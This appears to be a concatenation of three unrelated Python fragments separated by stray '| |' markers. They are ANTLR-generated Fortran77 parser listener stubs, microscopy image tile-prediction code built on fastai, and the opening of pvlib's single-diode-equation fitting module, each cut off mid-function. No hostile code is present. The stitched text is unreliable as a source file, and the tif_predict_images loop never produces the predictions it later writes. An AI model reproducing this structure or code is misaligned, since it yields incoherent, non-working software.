def enterControlEnd(self, ctx:Fortran77Parser.ControlEndContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlEnd.
def exitControlEnd(self, ctx:Fortran77Parser.ControlEndContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlErr.
def enterControlErr(self, ctx:Fortran77Parser.ControlErrContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlErr.
def exitControlErr(self, ctx:Fortran77Parser.ControlErrContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlIostat.
def enterControlIostat(self, ctx:Fortran77Parser.ControlIostatContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlIostat.
def exitControlIostat(self, ctx:Fortran77Parser.ControlIostatContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlFile.
def enterControlFile(self, ctx:Fortran77Parser.ControlFileContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlFile.
def exitControlFile(self, ctx:Fortran77Parser.ControlFileContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlStatus.
def enterControlStatus(self, ctx:Fortran77Parser.ControlStatusContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlStatus.
def exitControlStatus(self, ctx:Fortran77Parser.ControlStatusContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlAccess.
def enterControlAccess(self, ctx:Fortran77Parser.ControlAccessContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlAccess.
def exitControlAccess(self, ctx:Fortran77Parser.ControlAccessContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlPosition.
def enterControlPosition(self, ctx:Fortran77Parser.ControlPositionContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlPosition.
def exitControlPosition(self, ctx:Fortran77Parser.ControlPositionContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlForm.
def enterControlForm(self, ctx:Fortran77Parser.ControlFormContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlForm.
def exitControlForm(self, ctx:Fortran77Parser.ControlFormContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlRecl.
def enterControlRecl(self, ctx:Fortran77Parser.ControlReclContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlRecl.
def exitControlRecl(self, ctx:Fortran77Parser.ControlReclContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlBlank.
def enterControlBlank(self, ctx:Fortran77Parser.ControlBlankContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlBlank.
def exitControlBlank(self, ctx:Fortran77Parser.ControlBlankContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlExist.
def enterControlExist(self, ctx:Fortran77Parser.ControlExistContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlExist.
def exitControlExist(self, ctx:Fortran77Parser.ControlExistContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlOpened.
def enterControlOpened(self, ctx:Fortran77Parser.ControlOpenedContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlOpened.
def exitControlOpened(self, ctx:Fortran77Parser.ControlOpenedContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlNumber.
def enterControlNumber(self, ctx:Fortran77Parser.ControlNumberContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlNumber.
def exitControlNumber(self, ctx:Fortran77Parser.ControlNumberContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlNamed.
def enterControlNamed(self, ctx:Fortran77Parser.ControlNamedContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlNamed.
def exitControlNamed(self, ctx:Fortran77Parser.ControlNamedContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlName.
def enterControlName(self, ctx:Fortran77Parser.ControlNameContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlName.
def exitControlName(self, ctx:Fortran77Parser.ControlNameContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlSequential.
def enterControlSequential(self, ctx:Fortran77Parser.ControlSequentialContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlSequential.
def exitControlSequential(self, ctx:Fortran77Parser.ControlSequentialContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlDirect.
def enterControlDirect(self, ctx:Fortran77Parser.ControlDirectContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlDirect.
def exitControlDirect(self, ctx:Fortran77Parser.ControlDirectContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlFormatted.
def enterControlFormatted(self, ctx:Fortran77Parser.ControlFormattedContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlFormatted.
def exitControlFormatted(self, ctx:Fortran77Parser.ControlFormattedContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlUnformatted.
def enterControlUnformatted(self, ctx:Fortran77Parser.ControlUnformattedContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlUnformatted.
def exitControlUnformatted(self, ctx:Fortran77Parser.ControlUnformattedContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlNextrec.
def enterControlNextrec(self, ctx:Fortran77Parser.ControlNextrecContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlNextrec.
def exitControlNextrec(self, ctx:Fortran77Parser.ControlNextrecContext):
pass
# Enter a parse tree produced by Fortran77Parser#closeStatement.
def enterCloseStatement(self, ctx:Fortran77Parser.CloseStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#closeStatement.
def exitCloseStatement(self, ctx:Fortran77Parser.CloseStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#closeControl.
def enterCloseControl(self, ctx:Fortran77Parser.CloseControlContext):
pass
# Exit a parse tree produced by Fortran77Parser#closeControl.
def exitCloseControl(self, ctx:Fortran77Parser.CloseControlContext):
pass
# Enter a parse tree produced by Fortran77Parser#inquireStatement.
def enterInquireStatement(self, ctx:Fortran77Parser.InquireStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#inquireStatement.
def exitInquireStatement(self, ctx:Fortran77Parser.InquireStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#inquireControl.
def enterInquireControl(self, ctx:Fortran77Parser.InquireControlContext):
pass
# Exit a parse tree produced by Fortran77Parser#inquireControl.
def exitInquireControl(self, ctx:Fortran77Parser.InquireControlContext):
pass
# Enter a parse tree produced by Fortran77Parser#backspaceStatement.
def enterBackspaceStatement(self, ctx:Fortran77Parser.BackspaceStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#backspaceStatement.
def exitBackspaceStatement(self, ctx:Fortran77Parser.BackspaceStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#endfileStatement.
def enterEndfileStatement(self, ctx:Fortran77Parser.EndfileStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#endfileStatement.
def exitEndfileStatement(self, ctx:Fortran77Parser.EndfileStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#rewindStatement.
def enterRewindStatement(self, ctx:Fortran77Parser.RewindStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#rewindStatement.
def exitRewindStatement(self, ctx:Fortran77Parser.RewindStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#berFinish.
def enterBerFinish(self, ctx:Fortran77Parser.BerFinishContext):
pass
# Exit a parse tree produced by Fortran77Parser#berFinish.
def exitBerFinish(self, ctx:Fortran77Parser.BerFinishContext):
pass
# Enter a parse tree produced by Fortran77Parser#berFinishItem.
def enterBerFinishItem(self, ctx:Fortran77Parser.BerFinishItemContext):
pass
# Exit a parse tree produced by Fortran77Parser#berFinishItem.
def exitBerFinishItem(self, ctx:Fortran77Parser.BerFinishItemContext):
pass
# Enter a parse tree produced by Fortran77Parser#unitIdentifier.
def enterUnitIdentifier(self, ctx:Fortran77Parser.UnitIdentifierContext):
pass
# Exit a parse tree produced by Fortran77Parser#unitIdentifier.
def exitUnitIdentifier(self, ctx:Fortran77Parser.UnitIdentifierContext):
pass
# Enter a parse tree produced by Fortran77Parser#formatIdentifier.
def enterFormatIdentifier(self, ctx:Fortran77Parser.FormatIdentifierContext):
pass
# Exit a parse tree produced by Fortran77Parser#formatIdentifier.
def exitFormatIdentifier(self, ctx:Fortran77Parser.FormatIdentifierContext):
pass
# Enter a parse tree produced by Fortran77Parser#formatStatement.
def enterFormatStatement(self, ctx:Fortran77Parser.FormatStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#formatStatement.
def exitFormatStatement(self, ctx:Fortran77Parser.FormatStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#fmtSpec.
def enterFmtSpec(self, ctx:Fortran77Parser.FmtSpecContext):
pass
# Exit a parse tree produced by Fortran77Parser#fmtSpec.
def exitFmtSpec(self, ctx:Fortran77Parser.FmtSpecContext):
pass
# Enter a parse tree produced by Fortran77Parser#formatsep.
def enterFormatsep(self, ctx:Fortran77Parser.FormatsepContext):
pass
# Exit a parse tree produced by Fortran77Parser#formatsep.
def exitFormatsep(self, ctx:Fortran77Parser.FormatsepContext):
pass
# Enter a parse tree produced by Fortran77Parser#formatedit.
def enterFormatedit(self, ctx:Fortran77Parser.FormateditContext):
pass
# Exit a parse tree produced by Fortran77Parser#formatedit.
def exitFormatedit(self, ctx:Fortran77Parser.FormateditContext):
pass
# Enter a parse tree produced by Fortran77Parser#editElement.
def enterEditElement(self, ctx:Fortran77Parser.EditElementContext):
pass
# Exit a parse tree produced by Fortran77Parser#editElement.
def exitEditElement(self, ctx:Fortran77Parser.EditElementContext):
pass
# Enter a parse tree produced by Fortran77Parser#statementFunctionStatement.
def enterStatementFunctionStatement(self, ctx:Fortran77Parser.StatementFunctionStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#statementFunctionStatement.
def exitStatementFunctionStatement(self, ctx:Fortran77Parser.StatementFunctionStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#sfArgs.
def enterSfArgs(self, ctx:Fortran77Parser.SfArgsContext):
pass
# Exit a parse tree produced by Fortran77Parser#sfArgs.
def exitSfArgs(self, ctx:Fortran77Parser.SfArgsContext):
pass
# Enter a parse tree produced by Fortran77Parser#callStatement.
def enterCallStatement(self, ctx:Fortran77Parser.CallStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#callStatement.
def exitCallStatement(self, ctx:Fortran77Parser.CallStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#subroutineCall.
def enterSubroutineCall(self, ctx:Fortran77Parser.SubroutineCallContext):
pass
# Exit a parse tree produced by Fortran77Parser#subroutineCall.
def exitSubroutineCall(self, ctx:Fortran77Parser.SubroutineCallContext):
pass
# Enter a parse tree produced by Fortran77Parser#callArgumentList.
def enterCallArgumentList(self, ctx:Fortran77Parser.CallArgumentListContext):
pass
# Exit a parse tree produced by Fortran77Parser#callArgumentList.
def exitCallArgumentList(self, ctx:Fortran77Parser.CallArgumentListContext):
pass
# Enter a parse tree produced by Fortran77Parser#callArgument.
def enterCallArgument(self, ctx:Fortran77Parser.CallArgumentContext):
pass
# Exit a parse tree produced by Fortran77Parser#callArgument.
def exitCallArgument(self, ctx:Fortran77Parser.CallArgumentContext):
pass
# Enter a parse tree produced by Fortran77Parser#returnStatement.
def enterReturnStatement(self, ctx:Fortran77Parser.ReturnStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#returnStatement.
def exitReturnStatement(self, ctx:Fortran77Parser.ReturnStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#expression.
def enterExpression(self, ctx:Fortran77Parser.ExpressionContext):
pass
# Exit a parse tree produced by Fortran77Parser#expression.
def exitExpression(self, ctx:Fortran77Parser.ExpressionContext):
pass
# Enter a parse tree produced by Fortran77Parser#ncExpr.
def enterNcExpr(self, ctx:Fortran77Parser.NcExprContext):
pass
# Exit a parse tree produced by Fortran77Parser#ncExpr.
def exitNcExpr(self, ctx:Fortran77Parser.NcExprContext):
pass
# Enter a parse tree produced by Fortran77Parser#lexpr0.
def enterLexpr0(self, ctx:Fortran77Parser.Lexpr0Context):
pass
# Exit a parse tree produced by Fortran77Parser#lexpr0.
def exitLexpr0(self, ctx:Fortran77Parser.Lexpr0Context):
pass
# Enter a parse tree produced by Fortran77Parser#lexpr1.
def enterLexpr1(self, ctx:Fortran77Parser.Lexpr1Context):
pass
# Exit a parse tree produced by Fortran77Parser#lexpr1.
def exitLexpr1(self, ctx:Fortran77Parser.Lexpr1Context):
pass
# Enter a parse tree produced by Fortran77Parser#lexpr2.
def enterLexpr2(self, ctx:Fortran77Parser.Lexpr2Context):
pass
# Exit a parse tree produced by Fortran77Parser#lexpr2.
def exitLexpr2(self, ctx:Fortran77Parser.Lexpr2Context):
pass
# Enter a parse tree produced by Fortran77Parser#lexpr3.
def enterLexpr3(self, ctx:Fortran77Parser.Lexpr3Context):
pass
# Exit a parse tree produced by Fortran77Parser#lexpr3.
def exitLexpr3(self, ctx:Fortran77Parser.Lexpr3Context):
pass
# Enter a parse tree produced by Fortran77Parser#lexpr4.
def enterLexpr4(self, ctx:Fortran77Parser.Lexpr4Context):
pass
# Exit a parse tree produced by Fortran77Parser#lexpr4.
def exitLexpr4(self, ctx:Fortran77Parser.Lexpr4Context):
pass
# Enter a parse tree produced by Fortran77Parser#aexpr0.
| |
0: x_seams.add(trim_x_start)
if trim_y_start != 0: y_seams.add(trim_y_end)
blur_rects = []
blur_size = 5
for x_seam in x_seams:
left = x_seam - blur_size
right = x_seam + blur_size
top, bottom = 0, h
blur_rects.append((slice(top, bottom), slice(left, right)))
for y_seam in y_seams:
top = y_seam - blur_size
bottom = y_seam + blur_size
left, right = 0, w
blur_rects.append((slice(top, bottom), slice(left, right)))
for xs,ys in blur_rects:
assembled[xs,ys] = gaussian(assembled[xs,ys], sigma=1.0)
# if assembled.min() < 0: assembled -= assembled.min()
# assembled += imax
# assembled *= imax
# assembled *= (ma - mi)
# assembled += mi
return assembled.astype(np.float32).clip(0.,1.)
def unet_image_from_tiles(learn, in_img, tile_sz=128, scale=4):
cur_size = in_img.shape[1:3]
c = in_img.shape[0]
new_size = (cur_size[0] * scale, cur_size[1] * scale)
w, h = cur_size
in_tile = torch.zeros((c, tile_sz // scale, tile_sz // scale))
out_img = torch.zeros((1, w * scale, h * scale))
tile_sz //= scale
for x_tile in range(math.ceil(w / tile_sz)):
for y_tile in range(math.ceil(h / tile_sz)):
x_start = x_tile
x_start = x_tile * tile_sz
x_end = min(x_start + tile_sz, w)
y_start = y_tile * tile_sz
y_end = min(y_start + tile_sz, h)
in_tile[:, 0:(x_end - x_start), 0:(y_end - y_start)] = tensor(
in_img[:, x_start:x_end, y_start:y_end])
img = Image(tensor(npzoom(in_tile[0], scale, order=1)[None]))
out_tile, _, _ = learn.predict(img)
out_x_start = x_start * scale
out_x_end = x_end * scale
out_y_start = y_start * scale
out_y_end = y_end * scale
#print("out: ", out_x_start, out_y_start, ",", out_x_end, out_y_end)
in_x_start = 0
in_y_start = 0
in_x_end = (x_end - x_start) * scale
in_y_end = (y_end - y_start) * scale
#print("tile: ",in_x_start, in_y_start, ",", in_x_end, in_y_end)
out_img[:, out_x_start:out_x_end, out_y_start:
out_y_end] = out_tile.data[:, in_x_start:in_x_end,
in_y_start:in_y_end]
return out_img
def tif_predict_movie(learn,
tif_in,
orig_out='orig.tif',
pred_out='pred.tif',
size=128,
wsize=3):
im = PIL.Image.open(tif_in)
im.load()
times = im.n_frames
#times = min(times,100)
imgs = []
if times < (wsize + 2):
print(f'skip {tif_in} only {times} frames')
return
for i in range(times):
im.seek(i)
imgs.append(np.array(im).astype(np.float32) / 255.)
img_data = np.stack(imgs)
def pull_frame(i):
im.seek(i)
im.load()
return np.array(im)
preds = []
origs = []
img_max = img_data.max()
x, y = im.size
#print(f'tif: x:{x} y:{y} t:{times}')
for t in progress_bar(list(range(0, times - wsize + 1))):
img = img_data[t:(t + wsize)].copy()
img /= img_max
out_img = unet_multi_image_from_tiles(learn,
img,
tile_sz=size,
wsize=wsize)
pred = (out_img * 255).cpu().numpy().astype(np.uint8)
preds.append(pred)
orig = (img[1][None] * 255).astype(np.uint8)
origs.append(orig)
if len(preds) > 0:
all_y = img_to_uint8(np.concatenate(preds))
imageio.mimwrite(
pred_out, all_y,
bigtiff=True) #, fps=30, macro_block_size=None) # for mp4
all_y = img_to_uint8(np.concatenate(origs))
imageio.mimwrite(orig_out, all_y,
bigtiff=True) #, fps=30, macro_block_size=None)
def czi_predict_movie(learn,
czi_in,
orig_out='orig.tif',
pred_out='pred.tif',
size=128,
wsize=3):
with czifile.CziFile(czi_in) as czi_f:
proc_axes, proc_shape = get_czi_shape_info(czi_f)
channels = proc_shape['C']
depths = proc_shape['Z']
times = proc_shape['T']
#times = min(times, 100)
x, y = proc_shape['X'], proc_shape['Y']
#print(f'czi: x:{x} y:{y} t:{times} z:{depths}')
if times < (wsize + 2):
print(f'skip {czi_in} only {times} frames')
return
#folder_name = Path(pred_out).stem
#folder = Path(folder_name)
#if folder.exists(): shutil.rmtree(folder)
#folder.mkdir()
data = czi_f.asarray().astype(np.float32) / 255.
preds = []
origs = []
img_max = data.max()
#print(img_max)
for t in progress_bar(list(range(0, times - wsize + 1))):
idx = build_index(
proc_axes, {
'T': slice(t, t + wsize),
'C': 0,
'Z': 0,
'X': slice(0, x),
'Y': slice(0, y)
})
img = data[idx].copy()
img /= img_max
out_img = unet_multi_image_from_tiles(learn,
img,
tile_sz=size,
wsize=wsize)
pred = (out_img * 255).cpu().numpy().astype(np.uint8)
preds.append(pred)
#imsave(folder/f'{t}.tif', pred[0])
orig = (img[wsize // 2][None] * 255).astype(np.uint8)
origs.append(orig)
if len(preds) > 0:
all_y = img_to_uint8(np.concatenate(preds))
imageio.mimwrite(
pred_out, all_y,
bigtiff=True) #, fps=30, macro_block_size=None) # for mp4
all_y = img_to_uint8(np.concatenate(origs))
imageio.mimwrite(orig_out, all_y,
bigtiff=True) #, fps=30, macro_block_size=None)
def generate_movies(dest_dir, movie_files, learn, size, wsize=5):
for fn in progress_bar(movie_files):
ensure_folder(dest_dir)
pred_name = dest_dir/f'{fn.stem}_pred.tif'
orig_name = dest_dir/f'{fn.stem}_orig.tif'
if not Path(pred_name).exists():
if fn.suffix == '.czi':
# print(f'czi {fn.stem}')
czi_predict_movie(learn,
fn,
size=size,
orig_out=orig_name,
pred_out=pred_name,
wsize=wsize)
elif fn.suffix == '.tif':
tif_predict_movie(learn,
fn,
size=size,
orig_out=orig_name,
pred_out=pred_name,
wsize=wsize)
tif_fn = fn
# print(f'tif {fn.stem}')
else:
print(f'skip: {fn.stem} - doesn\'t exist')
def max_to_use(img):
return np.iinfo(np.uint8).max if img.dtype == np.uint8 else img.max()
def img_to_uint8(img, img_info=None):
img = img.copy()
if img_info and img_info['dtype'] != np.uint8:
img -= img.min()
img /= img.max()
img *= np.iinfo(np.uint8).max
return img.astype(np.uint8)
def img_to_float(img):
dtype = img.dtype
img_max = max_to_use(img)
img = img.astype(np.float32).copy()
mi, ma = np.percentile(img, [2,99.99])
img_range = ma - mi
real_max = img.max()
return img, {'img_max': img_max, 'real_max': real_max, 'mi': mi, 'ma': ma, 'dtype':dtype }
def tif_predict_images(learn,
tif_in,
dest,
category,
tag=None,
size=128,
max_imgs=None):
under_tag = f'_' if tag is None else f'_{tag}_'
dest_folder = Path(dest / category)
dest_folder.mkdir(exist_ok=True, parents=True)
pred_out = dest_folder / f'{tif_in.stem}{under_tag}pred.tif'
orig_out = dest_folder / f'{tif_in.stem}{under_tag}orig.tif'
if pred_out.exists():
print(f'{pred_out.stem} exists')
return
im = PIL.Image.open(tif_in)
im.load()
times = im.n_frames
if not max_imgs is None: times = min(max_imgs, times)
imgs = []
for i in range(times):
im.seek(i)
im.load()
imgs.append(np.array(im))
imgs, img_info = img_to_float(np.stack(imgs))
preds = []
x, y = im.size
print(f'tif: x:{x} y:{y} t:{times}')
for t in progress_bar(list(range(times))):
img = imgs[t]
img = img.copy()
if len(preds) > 0:
all_y = img_to_uint8(np.concatenate(preds))
imageio.mimwrite(pred_out, all_y, bigtiff=True)
shutil.copy(tif_in, orig_out)
def czi_predict_images(learn,
czi_in,
dest,
category,
tag=None,
size=128,
max_imgs=None):
with czifile.CziFile(czi_in) as czi_f:
under_tag = f'_' if tag is None else f'_{tag}_'
dest_folder = Path(dest / category)
dest_folder.mkdir(exist_ok=True, parents=True)
proc_axes, proc_shape = get_czi_shape_info(czi_f)
channels = proc_shape['C']
depths = proc_shape['Z']
times = proc_shape['T']
if not max_imgs is None: times = min(max_imgs, times)
x, y = proc_shape['X'], proc_shape['Y']
data, img_info = img_to_float(czi_f.asarray())
orig_dtype = data.dtype
img_max = data.max()
print(f'czi: x:{x} y:{y} t:{times} c:{channels} z:{depths} {img_max}')
channels_bar = progress_bar(
range(channels)) if channels > 1 else range(channels)
depths_bar = progress_bar(
range(depths)) if depths > 1 else range(depths)
times_bar = progress_bar(range(times)) if times > 1 else range(times)
for c in channels_bar:
for z in depths_bar:
preds = []
origs = []
if (depths > 1) or (channels > 1):
pred_out = dest_folder / f'{czi_in.stem}_c{c:02d}_z{z:02d}_{under_tag}_pred.tif'
orig_out = dest_folder / f'{czi_in.stem}_c{c:02d}_z{z:02d}_{under_tag}_orig.tif'
else:
pred_out = dest_folder / f'{czi_in.stem}_{under_tag}_pred.tif'
orig_out = dest_folder / f'{czi_in.stem}_{under_tag}_orig.tif'
if not pred_out.exists():
for t in times_bar:
idx = build_index(
proc_axes, {
'T': t,
'C': c,
'Z': z,
'X': slice(0, x),
'Y': slice(0, y)
})
img = data[idx].copy()
pred = unet_image_from_tiles_blend(learn,
img[None],
tile_sz=size,
img_info=img_info)
preds.append(pred[None])
origs.append(img[None])
if len(preds) > 0:
all_y = img_to_uint8(np.concatenate(preds))
imageio.mimwrite(pred_out, all_y, bigtiff=True)
all_y = img_to_uint8(np.concatenate(origs))
imageio.mimwrite(orig_out, all_y, bigtiff=True)
def generate_tifs(src, dest, learn, size, tag=None, max_imgs=None):
for fn in progress_bar(src):
category = fn.parts[-3]
try:
if fn.suffix == '.czi':
czi_predict_images(learn,
fn,
dest,
category,
size=size,
tag=tag,
max_imgs=max_imgs)
elif fn.suffix == '.tif':
tif_predict_images(learn,
fn,
dest,
category,
size=size,
tag=tag,
max_imgs=max_imgs)
except Exception as e:
print(f'exception with {fn.stem}')
print(e)
def ensure_folder(fldr, clean=False):
fldr = Path(fldr)
if fldr.exists() and clean:
print(f'wiping {fldr.stem} in 5 seconds')
sleep(5.)
shutil.rmtree(fldr)
if not fldr.exists(): fldr.mkdir(parents=True, mode=0o775, exist_ok=True)
return fldr
def subfolders(p):
return [sub for sub in p.iterdir() if sub.is_dir()]
def build_tile_info(data, tile_sz, train_samples, valid_samples, only_categories=None, skip_categories=None):
if skip_categories == None: skip_categories = []
if only_categories == None: only_categories = []
if only_categories: skip_categories = [c for c in skip_categories if c not in only_categories]
def get_category(p):
return p.parts[-2]
def get_mode(p):
return p.parts[-3]
def is_only(fn):
return (not only_categories) or (get_category(fn) in only_categories)
def is_skip(fn):
return get_category(fn) in skip_categories
def get_img_size(p):
with PIL.Image.open(p) as img:
h,w = img.size
return h,w
all_files = [fn for fn in list(data.glob('**/*.tif')) if is_only(fn) and not is_skip(fn)]
img_sizes = {str(p):get_img_size(p) for p in progress_bar(all_files)}
files_by_mode = {}
for p in progress_bar(all_files):
category = get_category(p)
mode = get_mode(p)
mode_list = files_by_mode.get(mode, {})
cat_list = mode_list.get(category, [])
cat_list.append(p)
mode_list[category] = cat_list
files_by_mode[mode] = mode_list
def pull_random_tile_info(mode, tile_sz):
files_by_cat = files_by_mode[mode]
category=random.choice(list(files_by_cat.keys()))
img_file=random.choice(files_by_cat[category])
h,w = img_sizes[str(img_file)]
return {'mode': mode,'category': category,'fn': img_file, 'tile_sz': tile_sz, 'h': h, 'w':w}
tile_infos = []
for i in range(train_samples):
tile_infos.append(pull_random_tile_info('train', tile_sz))
for i in range(valid_samples):
tile_infos.append(pull_random_tile_info('valid', tile_sz))
tile_df = pd.DataFrame(tile_infos)[['mode','category','tile_sz','h','w','fn']]
return tile_df
def draw_tile(img, tile_sz):
max_x,max_y = img.shape
x = random.choice(range(max_x-tile_sz)) if max_x > tile_sz else 0
y = random.choice(range(max_y-tile_sz)) if max_y > tile_sz else 0
xs = slice(x,min(x+tile_sz, max_x))
ys = slice(y,min(y+tile_sz, max_y))
tile = img[xs,ys].copy()
return tile, (xs,ys)
def check_tile(img, thresh, thresh_pct):
return (img > thresh).mean() > thresh_pct
def draw_random_tile(img_data, tile_sz, thresh, thresh_pct):
max_tries = 200
found_tile = False
tries = 0
while not found_tile:
tile, (xs,ys) = draw_tile(img_data, tile_sz)
found_tile = check_tile(tile, thresh, thresh_pct)
# found_tile = True
tries += 1
if tries > (max_tries/2): thresh_pct /= 2
if | |
"""
The ``sde`` module contains functions to fit the single diode equation.
Function names should follow the pattern "fit_" + fitting method.
"""
import numpy as np
from pvlib.ivtools.utils import _schumaker_qspline
# set constant for numpy.linalg.lstsq parameter rcond
# rcond=-1 for numpy<1.14, rcond=None for numpy>=1.14
# TODO remove after minimum numpy version >= 1.14
minor = int(np.__version__.split('.')[1])
if minor < 14:
RCOND = -1
else:
RCOND = None
def fit_sandia_simple(voltage, current, v_oc=None, i_sc=None, v_mp_i_mp=None,
vlim=0.2, ilim=0.1):
r"""
Fits the single diode equation (SDE) to an IV curve.
Parameters
----------
voltage : ndarray
1D array of `float` type containing voltage at each point on the IV
curve, increasing from 0 to ``v_oc`` inclusive. [V]
current : ndarray
1D array of `float` type containing current at each point on the IV
curve, from ``i_sc`` to 0 inclusive. [A]
v_oc : float, default None
Open circuit voltage. If not provided, ``v_oc`` is taken as the
last point in the ``voltage`` array. [V]
i_sc : float, default None
Short circuit current. If not provided, ``i_sc`` is taken as the
first point in the ``current`` array. [A]
v_mp_i_mp : tuple of float, default None
Voltage, current at maximum power point. If not provided, the maximum
power point is found at the maximum of ``voltage`` \times ``current``.
[V], [A]
vlim : float, default 0.2
Defines portion of IV curve where the exponential term in the single
diode equation can be neglected, i.e.
``voltage`` <= ``vlim`` x ``v_oc``. [V]
ilim : float, default 0.1
Defines portion of the IV curve where the exponential term in the
single diode equation is significant, approximately defined by
``current`` < (1 - ``ilim``) x ``i_sc``. [A]
Returns
-------
photocurrent : float
photocurrent [A]
saturation_current : float
dark (saturation) current [A]
resistance_series : float
series resistance [ohm]
resistance_shunt : float
shunt (parallel) resistance [ohm]
nNsVth : float
product of thermal voltage ``Vth`` [V], diode ideality factor
``n``, and number of series cells ``Ns``. [V]
Raises
------
RuntimeError if parameter extraction is not successful.
Notes
-----
Inputs ``voltage``, ``current``, ``v_oc``, ``i_sc`` and ``v_mp_i_mp`` are
assumed to be from a single IV curve at constant irradiance and cell
temperature.
:py:func:`fit_sandia_simple` obtains values for the five parameters for
the single diode equation [1]_:
.. math::
I = I_{L} - I_{0} (\exp \frac{V + I R_{s}}{nNsVth} - 1)
- \frac{V + I R_{s}}{R_{sh}}
See :py:func:`pvsystem.singlediode` for definition of the parameters.
The extraction method [2]_ proceeds in six steps.
1. In the single diode equation, replace :math:`R_{sh} = 1/G_{p}` and
re-arrange
.. math::
I = \frac{I_{L}}{1 + G_{p} R_{s}} - \frac{G_{p} V}{1 + G_{p} R_{s}}
- \frac{I_{0}}{1 + G_{p} R_{s}} (\exp(\frac{V + I R_{s}}{nN_sV_{th}})
- 1)
2. The linear portion of the IV curve is defined as
:math:`V \le vlim \times v_{oc}`. Over this portion of the IV curve,
.. math::
\frac{I_{0}}{1 + G_{p} R_{s}} (\exp(\frac{V + I R_{s}}{nN_sV_{th}})
- 1) \approx 0
3. Fit the linear portion of the IV curve with a line.
.. math::
I &\approx \frac{I_{L}}{1 + G_{p} R_{s}}
- \frac{G_{p}}{1 + G_{p}R_{s}} V
&= \beta_{0} + \beta_{1} V
4. The exponential portion of the IV curve is defined by
:math:`\beta_{0} + \beta_{1} \times V - I > ilim \times i_{sc}`.
Over this portion of the curve,
:math:`\exp((V + IR_s)/{nN_sV_{th}}) \gg 1` so that
.. math::
\exp(\frac{V + I R_{s}}{nN_sV_{th}}) - 1 \approx
\exp(\frac{V + I R_{s}}{nN_sV_{th}})
5. Fit the exponential portion of the IV curve.
.. math::
\log(\beta_{0} - \beta_{1} V - I)
&\approx \log(\frac{I_{0}}{1 + G_{p} R_{s}} + \frac{V}{nN_sV_{th}}
+ \frac{I R_{s}}{nN_sV_{th}}) \\
&= \beta_{2} + \beta_{3} V + \beta_{4} I
6. Calculate values for ``IL, I0, Rs, Rsh,`` and ``nNsVth`` from the
regression coefficents :math:`\beta_{0}, \beta_{1}, \beta_{3}` and
:math:`\beta_{4}`.
References
----------
.. [1] <NAME>, <NAME>, <NAME>, "Applied Photovoltaics" ISBN
0 86758 909 4
.. [2] <NAME>, <NAME>, "Single Diode Parameter Extraction from
In-Field Photovoltaic I-V Curves on a Single Board Computer", 46th IEEE
Photovoltaic Specialist Conference, Chicago, IL, 2019
"""
# If not provided, extract v_oc, i_sc, v_mp and i_mp from the IV curve data
if v_oc is None:
v_oc = voltage[-1]
if i_sc is None:
i_sc = current[0]
if v_mp_i_mp is not None:
v_mp, i_mp = v_mp_i_mp
else:
v_mp, i_mp = _find_mp(voltage, current)
# Find beta0 and beta1 from linear portion of the IV curve
beta0, beta1 = _sandia_beta0_beta1(voltage, current, vlim, v_oc)
# Find beta3 and beta4 from the exponential portion of the IV curve
beta3, beta4 = _sandia_beta3_beta4(voltage, current, beta0, beta1, ilim,
i_sc)
# calculate single diode parameters from regression coefficients
return _sandia_simple_params(beta0, beta1, beta3, beta4, v_mp, i_mp, v_oc)
def _find_mp(voltage, current):
"""
Finds voltage and current at maximum power point.
Parameters
----------
voltage : ndarray
1D array containing voltage at each point on the IV curve, increasing
from 0 to v_oc inclusive, of `float` type. [V]
current : ndarray
1D array containing current at each point on the IV curve, decreasing
from i_sc to 0 inclusive, of `float` type. [A]
Returns
-------
